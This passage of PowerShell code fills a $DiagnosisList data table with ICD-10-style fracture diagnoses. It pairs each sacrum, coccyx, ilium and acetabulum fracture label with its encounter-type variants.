Zone III fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced Zone III fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced Zone III fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced Zone III fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced Zone III fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified Zone III fracture of sacrum","Unspecified Zone III fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type 1 fracture of sacrum","Type 1 fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type 2 fracture of sacrum","Type 2 fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type 3 fracture of sacrum","Type 3 fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type 4 fracture of sacrum","Type 4 fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of sacrum","Other fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of coccyx","Fracture of coccyx, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right ilium","Unspecified fracture of right ilium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left ilium","Unspecified fracture of left ilium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified ilium","Unspecified fracture of unspecified ilium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of right ilium","Displaced avulsion fracture of right ilium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of left ilium","Displaced avulsion fracture of left ilium, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of unspecified ilium","Displaced avulsion fracture of unspecified ilium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of right ilium","Nondisplaced avulsion fracture of right ilium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of left ilium","Nondisplaced avulsion fracture of left ilium, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of unspecified ilium","Nondisplaced avulsion fracture of unspecified ilium, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right ilium","Other fracture of right ilium, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left ilium","Other fracture of left ilium, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified ilium","Other fracture of unspecified ilium, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right acetabulum","Unspecified fracture of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left acetabulum","Unspecified fracture of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified acetabulum","Unspecified fracture of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of right acetabulum","Displaced fracture of anterior wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of left acetabulum","Displaced fracture of anterior wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior wall of unspecified acetabulum","Displaced fracture of anterior wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of right acetabulum","Nondisplaced fracture of anterior wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of left acetabulum","Nondisplaced fracture of anterior wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior wall of unspecified acetabulum","Nondisplaced fracture of anterior wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of right acetabulum","Displaced fracture of posterior wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of left acetabulum","Displaced fracture of posterior wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior wall of unspecified acetabulum","Displaced fracture of posterior wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of right acetabulum","Nondisplaced fracture of posterior wall of right acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of left acetabulum","Nondisplaced fracture of posterior wall of left acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior wall of unspecified acetabulum","Nondisplaced fracture of posterior wall of unspecified acetabulum, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of anterior column [iliopubic] of right acetabulum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of anterior column [iliopubic] of right acetabulum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of anterior column [iliopubic] of right acetabulum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior column [iliopubic] of right acetabulum","Displaced fracture of 